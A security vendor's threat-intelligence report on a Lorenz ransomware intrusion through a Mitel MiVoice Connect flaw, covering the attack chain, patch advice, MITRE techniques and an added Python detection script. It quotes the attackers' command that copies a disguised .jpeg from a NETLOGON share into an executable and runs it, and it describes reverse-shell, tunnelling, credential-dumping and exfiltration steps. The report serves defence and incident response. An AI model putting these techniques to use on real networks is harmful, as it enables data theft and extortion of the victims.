A Summary of the Lorenz Ransomware Group Attack
Blackpoint Cyber’s Adversary Pursuit Group (APG) and Security Operations Center (SOC) analyzed a recent attack conducted by the Lorenz ransomware group. Lorenz has been active in the wild since early 2021 and is known to leverage a vulnerability in MiVoice Connect (CVE-2022-29499), one of many Mitel Voice-over-IP (VoIP) products that are used by organizations in critical sectors worldwide. The group uses this access to exfiltrate data with FileZilla and to encrypt data with Microsoft’s BitLocker Drive Encryption. The attack method involves a double extortion technique: payment is demanded both for decryption and for deleting the exfiltrated data from their leak site. It appears Lorenz targets larger, English-speaking enterprise environments and requests a ransom between $500,000 and $700,000. During the SOC’s analysis of the incident, they were able to recover the malicious executable used to launch the encryption phase of the attack.
The APG analyzed the malicious executable, SVC_WSC.exe, and discovered the extraction and use of .NET Core and custom .NET dynamic link libraries (DLLs). This allows for the execution of the final BitLocker encryption payload instead of PowerShell, which has been seen in previous attacks. The switch to .NET Core DLLs is concerning because it is harder to detect and is a cross-platform framework, meaning the ransomware group could be targeting a wider variety of operating systems (OSs). APG also discovered the use of a hardcoded BitLocker recovery key, BitLocker password, and victim domain information, indicating the attack was targeted rather than a randomized widespread attack.
Technical Analysis of Lorenz’s Exploitation of MiVoice Connect
Initial Access and Execution
Based on evaluations from other security researchers, the Lorenz ransomware group has been gaining initial access by exploiting a vulnerability in the Mitel Service Appliance component of MiVoice Connect (CVE-2022-29499). When exploited, this vulnerability allows for command injection and remote code execution (RCE). Blackpoint’s SOC confirmed the network that this incident occurred on had a Mitel appliance exposed to the internet.
Affected devices include:
MiVoice Connect – Mitel Service Appliance versions:
- SA100
- SA400
- Virtual SA
Running software versions:
- MiVoice Connect 14.2 and earlier
- R19.2 SP3 (22.20.2300.0) and earlier
- R14.x and earlier
On April 19, 2022, Mitel released a script to temporarily fix the vulnerability (CVE-2022-29499) for releases R19.2 SP3 (and earlier) and R14.x (and earlier), before releasing a fully patched version (R19.3) in July of 2022.
Once the threat actors established command execution via HTTP GET requests, they used cURL to download a shell script that opens a reverse shell connection directly to the Mitel system. After gaining initial access, the adversary is known to wait an extended period of time, typically a month or more, before continuing with the attack. Lorenz uses Chisel to utilize the Mitel VoIP device as a SOCKS proxy server which creates a Secure Shell (SSH) tunnel transported over HTTP. After setting up the proxy server, they used CrackMapExec, taking advantage of Active Directory features and protocols for credential dumping. This allowed them to compromise two domain administrator accounts required for the follow-on activity in the attack. After initial access and compromising domain administrator accounts, the adversary moved on to discovery and lateral movement.
Discovery and Lateral Movement of Lorenz Ransomware Group
The threat actors used certutil.exe to identify domain controllers in the environment. Certutil.exe is a command-line tool used to display certification authority (CA) configurations. The following Microsoft built-in tools were also used to identify workstations, servers, and network devices within the environment. System and network enumeration allows the attackers to gain a digital view of the assets within the enterprise system. This helps them identify critical systems and paths of attack for lateral movement.
- netsh: configure and display firewall information
- ipconfig: display TCP/IP network configurations
- netstat: display active and listening TCP ports
Once the threat actors identified critical systems and open paths to proceed with the attack, they used the compromised administrator accounts to abuse remote desktop protocol (RDP) for lateral movement. After compromising the domain controller, a file masquerading as a JPEG was dropped in the NETLOGON share to be pulled to the other systems during the final stage of the attack.
Lorenz’s Exfiltration of Data and System Encryption
FileZilla, a free and open-source FTP/SFTP ([Secure] File Transfer Protocol) software, was installed using the compromised administrator accounts and used to exfiltrate victim data and information over port 22 using the Chisel SOCKS proxy server. After exfiltrating data, they moved on to the last step of the attack, encrypting systems using Microsoft’s BitLocker Drive Encryption.
A cmd.exe child process under svchost.exe, owned by SYSTEM, copied domain.jpeg from the domain controller, NETLOGON share, to the target machine.
/Q /C (copy \\domain.com\NETLOGON\domain.jpeg c:\SVC_WSC.exe \
&& dir && dir && c:\SVC_WSC.exe && dir)
SVC_WSC.exe is a C++ compiled executable which extracts all the .NET Core DLLs required for the final piece of the attack: full disk encryption. The DLLs are extracted into a folder resembling “C:\Users\Username\AppData\Local\Temp\.net\lorenz\1jtvsmf0.wwh” (see Figure 1).
After extraction, several DLLs are injected back into the SVC_WSC.exe process (see Figure 2).
The main.dll library contains the BitLocker encryptor, recovery key, and password, which were discovered through the APG’s reverse engineering efforts.
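The process chain above (a SYSTEM cmd.exe under svchost.exe copying a .jpeg from the NETLOGON share to an .exe and running it in the same command, followed by DLLs loaded from the %TEMP%\.net\ extraction directory) can be expressed as a small detection. The following Python is an added example, not Blackpoint’s code or part of the original report; the events, the share name corp.example, the user names and the loaded-module path are constructed for illustration.

```python
import re

# Constructed process-creation events for illustration; not telemetry from the incident.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"cmd.exe /Q /C (copy \\corp.example\NETLOGON\corp.jpeg c:\SVC_WSC.exe && dir && dir && c:\SVC_WSC.exe && dir)"},
    {"parent": r"C:\SVC_WSC.exe", "image": r"C:\SVC_WSC.exe", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"C:\SVC_WSC.exe",
     "loaded": [r"C:\Users\svc\AppData\Local\Temp\.net\lorenz\1jtvsmf0.wwh\main.dll"]},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "user": r"CORP\alice",
     "cmdline": r"cmd.exe /c copy \\corp.example\NETLOGON\logon.bat c:\temp\logon.bat"},
]

# A copy whose source on a NETLOGON share has a non-executable extension but whose destination is an .exe.
NETLOGON_MASQ = re.compile(
    r"copy\s+\\\\\S+\\NETLOGON\\\S+\.(?:jpe?g|png|gif|txt|pdf)\s+(\S+\.exe)", re.IGNORECASE)
# Extraction directory used by self-extracting .NET single-file apps (%TEMP%\.net\<app>\<random>).
DOTNET_TEMP = re.compile(r"\\AppData\\Local\\Temp\\\.net\\", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the names of the rules a single event matches (empty list if benign)."""
    hits = []
    cmd = event.get("cmdline", "")
    m = NETLOGON_MASQ.search(cmd)
    if m:
        hits.append("netlogon_copy_masquerade")
        # The same command also executes the freshly copied destination: stronger signal.
        if m.group(1).lower() in cmd[m.end():].lower():
            hits.append("copy_then_execute")
    if (basename(event.get("parent", "")) == "svchost.exe"
            and basename(event.get("image", "")) == "cmd.exe"
            and event.get("user", "").upper().endswith("\\SYSTEM")
            and "netlogon" in cmd.lower()):
        hits.append("system_cmd_from_svchost_touching_netlogon")
    # Image path or any loaded module under the .NET extraction directory.
    if any(DOTNET_TEMP.search(p) for p in [event.get("image", "")] + event.get("loaded", [])):
        hits.append("dotnet_temp_extraction_load")
    return hits

def scan(events):
    """Map event index -> matched rules, keeping only events that matched something."""
    return {i: hits for i, e in enumerate(events) if (hits := evaluate(e))}
```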
Recovering from the Lorenz Ransomware Group Attack
The APG wrote a Python script that parses, extracts, and decodes obfuscated strings from main.dll, which includes a BitLocker Recovery Key and password (see Figures 3-6).
The decoder script is available on the Blackpoint GitHub page, allowing victims to extract their decoded recovery information. This script has only been tested on the sample obtained during this incident.
Mitigating Attacks with Updates to Mitel VoIP Devices
Update the following Mitel Devices:
Mitel Service Appliance versions:
- SA100
- SA400
- Virtual SA
running software versions:
- MiVoice Connect 14.2 and earlier
- R19.2 SP3 (22.20.2300.0) and earlier
- R14.x and earlier
Patched Release:
- R19.3 (released July 2022)
Arctic Wolf has created Suricata and YARA rules for detecting Lorenz.
Conclusion
It appears the Lorenz ransomware group will continue with a couple of methods:
- Develop and update their ransomware attacks by implementing new features such as leveraging .NET DLLs
- Utilize double extortion.
The switch to .NET could be a sign of a larger change ahead, including the spread to multiple OSs. Double extortion methods allow threat actors to retain leverage even if the files are recovered from backups. Since the patch for Mitel MiVoice has been available since July 2022, allowing more companies to patch the vulnerability, Lorenz will likely move on to a different initial access path. That said, mitigation is still the best solution. Continue to keep an eye out for further updates and read up on all Blackpoint APG intel. The APG has developed a Python decoder script, also available on GitHub, based on the sample they reverse engineered. The script analyzes the final payload file (main.dll) of the attack to extract the BitLocker recovery key and password. We hope this threat intelligence helps arm your defenses.
Indicators of Compromise (IoCs)
SHA256
We were able to collect hashes for the SVC_WSC.exe and main.dll files but given they are unique to the customer we cannot release them at this time.
Tactics, Techniques, and Procedures (TTPs)
Initial Access
MITRE Technique: Exploit Public-Facing Application
- Description: Exploited Mitel MiVoice Connect vulnerability (CVE-2022-29499)
Resource Development
MITRE Technique: Obtain Capabilities – Tool
- Description:
- FileZilla – Exfiltration
- Chisel – Defense Evasion
- BitLocker – Impact
Command and Control
MITRE Technique: Encrypted Channel
- Description: Reverse shell encrypted with TLS
MITRE Technique: Non-Application Layer Protocol
- Description: Chisel used to create SOCKS proxy server, an SSH tunnel transported over HTTP
Credential Access
MITRE Technique: OS Credential Dumping – LSASS Memory
- Description: CrackMapExec to dump Active Directory credentials
Privilege Escalation
MITRE Technique: Domain Accounts
- Description: Obtained domain administrator credentials
MITRE Technique: Local Accounts
- Description: Obtained local administrator credentials
Discovery
MITRE Technique: Network System Discovery
- Description: netstat – displays active and listening TCP ports
MITRE Technique: System Network Configuration Discovery
- Description:
- netsh – configure and display firewall information
- ipconfig – display TCP/IP network configurations
MITRE Technique: Domain Trust Discovery
- Description: certutil.exe – identify domain controllers
Lateral Movement
MITRE Technique: Remote Services – Remote Desktop Protocol
- Description: Used obtained credentials for Remote Desktop access
Exfiltration
MITRE Technique: Exfiltration over C2 Channel
- Description: Exfiltration was passed through SOCKS proxy using FileZilla
Impact
MITRE Technique: Data Encrypted for Impact
- Description: BitLocker used to encrypt systems
Defense Evasion
MITRE Technique: Obfuscated Files or Information
- Description:
- Payload was copied from NETLOGON as .jpeg file
- Main.dll contains obfuscated strings
References
- Arctic Wolf – Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
- Mitel – Mitel Product Security Advisory 22-0002
- NIST – CVE-2022-29499 Detail
- GitHub – Chisel